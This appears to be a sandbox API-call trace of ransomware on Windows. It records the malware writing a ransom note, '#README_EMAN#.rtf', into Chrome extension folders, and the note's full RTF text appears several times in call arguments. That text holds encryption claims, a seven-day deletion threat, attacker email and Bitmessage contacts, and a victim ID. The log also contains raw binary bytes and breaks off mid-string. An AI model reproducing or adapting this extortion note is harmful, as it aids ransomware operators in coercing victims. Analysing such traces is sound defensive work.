\\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.360] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.360] CloseHandle (hObject=0x294) returned 1 [0273.360] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\#readme_eman#.rtf")) returned 0xffffffff [0273.360] GetLastError () returned 0x2 [0273.360] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 